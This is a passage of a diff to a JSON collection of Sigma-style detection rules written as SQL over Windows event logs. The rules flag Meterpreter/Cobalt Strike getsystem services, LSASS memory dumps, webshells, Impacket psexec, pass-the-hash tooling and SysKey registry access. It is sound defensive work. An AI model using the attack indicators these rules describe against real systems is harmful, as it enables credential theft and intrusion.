LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": 
"Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to 
CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": 
"c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where 
the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write 
scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": 
"file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - 
"attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE 
'%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR 